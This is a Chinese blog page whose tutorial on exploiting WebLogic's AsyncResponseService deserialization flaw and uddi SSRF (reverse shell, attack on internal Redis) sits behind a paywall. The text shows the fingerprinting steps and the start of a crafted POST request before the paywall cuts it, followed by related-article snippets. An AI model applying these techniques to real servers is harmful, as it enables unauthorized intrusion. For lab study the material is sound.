WebLogic反序列化漏洞&SSRF漏洞

最新推荐文章于 2025-04-08 08:00:00 发布
原创 最新推荐文章于 2025-04-08 08:00:00 发布 · 385 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络 #安全

本文详细介绍了WebLogic的反序列化漏洞和SSRF漏洞。反序列化漏洞通过特定URL后的404页面识别,利用AsyncResponseService成功触发并反弹shell。SSRF漏洞出现在uddi组件,通过伪造请求探测内网服务,结合换行注入可攻击内网中的redis服务器,实现shell获取。

一反序列化漏洞

1)、特征
在被检测应用系统url后随机添加字符串,出现的404页面如下:
在这里插入图片描述说明被检测系统的中间件为WebLogic

2)、利用
启动环境
在这里插入图片描述访问AsyncResponseService
在这里插入图片描述说明存在漏洞

kali开启监听
在这里插入图片描述抓取访问AsyncResponseService 的数据包,发送到重发模块,并替换如下

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.133.128:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Length: 797
content-type: text/xml


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
最低0.47元/天 解锁文章
我眼里的Weblogic 反序列化
Vicl1fe的博客
06-02 379
前言 满怀期待的学习Weblogic反序列化 环境搭建 本来想着自己下载webloigc环境,搞了半天也没搞定,年少不知工具香。 还是选择了在docker里搭建,然后使用idea进行远程调试。 weblogic下载地址,我下载的是10.3.6.0的 https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html jdk7下载地址 http://www.oracle.com/java/technologies/jav
weblogic之T3反序列化
weixin_45682070的博客
03-02 2150
T3协议 什么是T3协议? 解释摘抄自此文 Weblogic的RMI规范的实现使用一个专有协议T3。 您可以将T3(和安全T3S)视为坐在http之上的一个图层,以公开/允许客户端的JNDI调用。 通常,T3协议用于与WebLogic控制台进行交互。 T3是用于在WebLogic服务器和其他types的Java程序之间传输信息的协议。 WebLogic会跟踪连接到应用程序的每个Java虚拟机。 为了将stream量传送到Java虚拟机,WebLogic创build一个T3连接。 这种types的连接通过消除
weblogic预警及历史漏洞
a1b2c3是弱口令
10-17 1513
简介 1、 Oracle WebLogic CVE-2019-2891 漏洞预警 2、WebLogic历史漏洞回顾 1.预警 Oracle 官方发布了 2019 年 10 月的严重补丁更新 CPU(Critical Patch Update),其中修复了存在于 WebLogic 中的一个高危漏洞(CVE-2019-2891)。 1.1预警描述 此漏洞为远程代码执行漏洞,基于全球使用该产品用...
hw蓝队初级面试总结_weblogic反序列化流量特征(1)
2401_84296945的博客
05-16 760
需要完整版PDF学习资源。
web渗透工程师——初级面试总结
m0_61506558的博客
10-12 3023
根据sql注入各自的特点可以分为联合注入、二次注入、宽字节注入、堆叠注入等,根据http报文中的不同位置可以有cookie注入、referer注入、x-forwarded-for注入等。产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,与后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。大小写绕过 、编码绕过、注释绕过、关键字/关键函数替换、参数污染、缓存区溢出、特殊符号。
No.28 笔记 | 反序列化漏洞学习总结
聚焦网络安全,以多元语言优势汲取知识,分享生动有趣的学习与技术心得。
12-25 1119
序列化:将对象转换为字节流,便于在内存、文件、数据库中存储,保证对象完整性与可传递性。例如,把一个包含用户信息(姓名、年龄等)的对象序列化为字节流后,可以方便地进行存储或传输。反序列化:是序列化的逆过程,依据字节流中的对象状态及描述信息重建对象。比如,从存储介质中读取字节流并还原为原始对象。应用场景:广泛应用于远程和进程间通信(RPC/IPC)、连线协议、Web服务、消息代理、缓存/持久性存储区、数据库、缓存服务器、文件系统、HTTP cookie、HTML表单参数、API身份验证令牌等场景。
weblogic漏洞扫描工具 反序列化漏洞扫描工具
javagty6778的博客
03-16 316
weblogic工具 妄想试图weblogic一把梭目前检测的功能后期可以的话还会继续加功能的,主要是一些反序列化的poc真的不好写,我也不咋会…
第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程
ABC_123的博客
06-27 2687
Part1前言大家好,我是ABC_123。前两期分享了《第14篇:Struts2框架下Log4j2漏洞检测方法分析与总结》、《第15篇:内网横向中windows各端口远程登录哈希传递的方法总结》,本期讲解一个Weblogic拿权限案例。最近安服的同事打比赛,给我陆续发了好几个没有拿下来的Weblogic的站点,一直在想尽各种办法研究,争取拿下权限。各种WAF防护、终...
反序列化漏洞 Waf 绕过技术:解析与执行的认知博弈
最新发布
syg6921008的博客
04-08 1600
在当前的安全攻防实践中,针对反序列化漏洞的 WAF 检测机制仍存在诸多盲区与不完善之处。为了更深入地理解其绕过方式,我查阅了大量公开研究、实战案例与工具源码,并系统性地梳理出了9 类典型的反序列化漏洞 WAF 绕过技术策略。“在不被识别为恶意的前提下,如何让 payload 既具备混淆性,又能精准执行?WAF 绕过从来不只是编码和隐藏,更是一种关于解析、执行路径与安全策略认知的博弈。希望本文的内容,能为你的实战思路带来一些启发。💡。
【技术推荐】WebLogic 反序列化漏洞深入分析
m0_73257876的博客
09-25 3574
WebLogic 漏洞存在较多的反序列化类和反序列化的途径,在使用黑名单防御手段下,攻击者只要找到新的反序列化触发点,就能造成新的危害。比如,你有一个类 A,类里面有个属性是类 B,这个时候,在反序列化的过程中,就会先反序列化类 A,之后在填充类 A 的过程中,继续反序列化类 B,类 B 在反序列化完成后,填充到类 A 中,同时整个过程都在一个流中操作,这个时候,只要还是 ObjectOutStream 的 read_value进行反序列化操作就不能饶过黑名单!
从防护角度看Weblogic反序列化历史漏洞
猪肉炖白菜
07-09 761
一、前言 Weblogic反序列化漏洞是一个经典的漏洞系列,根源在于Weblogic(及其他很多java服务器应用)在通信过程中传输数据对象,涉及到序列化和反序列化操作,如果能找到某个类在反序列化过程中能执行某些奇怪的代码,就有可能通过控制这些代码达到RCE的效果。随着每次补丁的修复,很多Weblogic反序列化的思路都被封禁了,但是跟Struts2系列漏洞不同的是,Weblogic漏洞由于涉及的面比较广,所以近几年还是持续有新出漏洞的,这也体现了挖掘出新漏洞的高手们对java语言理解之深。目前在做渗透测
weblogic反序列化介绍及环境搭建
遇事不决冲冲冲
05-08 4056
weblogic是一个常用的web中间件,它的反序列化漏洞也算是比较经典,而在weblogic里面其实反序列化漏洞大致分为两种,一个是基于T3协议的反序列化漏洞,一个是基于XML的反序列化漏洞,一个原因就是配置环境配了好长时间,这篇就当作专门介绍环境搭建了吧Cve-2017-3506Cve-2017-10271Cve-2019-2729Cve-2019-2725CVE-2015-4852CVE-2016-0638CVE-2016-3510CVE-2017-3248CVE-2018-2628 CVE-20
Javaweb安全——Weblogic反序列化漏洞(一)
weixin_43610673的博客
12-11 3361
从原生反序列化过程开始谈起。
weblogic反序列化之T3协议
snowlyzz的博客
01-16 3533
T3反序列化学习
网络安全——实操weblogic的ssrf漏洞
Demo不是emo的博客
09-18 2769
今天我们讲的还是ssrf漏洞的利用,选择的环境是weblogic的ssrf历史漏洞,需要用到vulhub靶场和docker环境,都给大家准备好了,需要的自取自用,这服务不得打满分啊?
我眼中的Weblogic-SSRF
ovowovo的博客
12-10 858
一、ssrf简述: SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,一般情况下,ssrf攻击的目标是从外网无法访问的内部系统(正是因为他是有服务器端发起的,所以他能够请求到与他相连而与外网隔离的内部系统) 影响版本:10.0.2.0 10.3.6.0 SSRF危害以及可实现的攻击行为 主...
hw蓝队初级面试总结
热门推荐
G208_522的博客
05-27 1万+
1、sql注入原理、分类、绕过 原理:产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,与后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。 分类:我们可以把sql注入直接的分为字符型和数字型,主要特点就是在进行sql注入的时候是否需要闭合传参的单引号,不需要闭合说明是数值型,反之就是字符型;还可以将sql注入分为有回显的注入和无回显的注入,无回显的注入又别称为盲注,盲注有三大
iwebsec靶场 反序列化关卡通关笔记2-反序列化漏洞示例02
mooyuan的网络安全博客
09-27 1511
iwebsec靶场反序列化关卡渗透实战:关键函数destruct是通过参数来判断,如果传入参数时show就决定调用show函数,如果传入参数时login就调用login函数,另外如果参数时source就调用source函数。如上所示,打印了obj内容中的username和role,select *内容为3列,由于不知道顺序使什么样的,为了使可以查询password,我们可以构造语句。这里可以看到函数被wakeup函数处理,输出的内容中包含了mysql_escape_string,增加了转义符处理,如下所示。
iwebsec靶场 中间件漏洞通关笔记1-Weblogic中间件漏洞
mooyuan的网络安全博客
04-21 1890
通过实战iwebsec靶场的Weblogic SSRF中间件漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
全面探索Weblogic漏洞扫描工具的多维功能
CVE-2018-2628是另一个针对Weblogic的Java反序列化漏洞,它存在于Weblogic服务器的T3协议中,攻击者可以利用该漏洞执行远程代码。Java反序列化漏洞在当时是一个非常普遍且严重的问题,很多Java框架和服务都受到该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值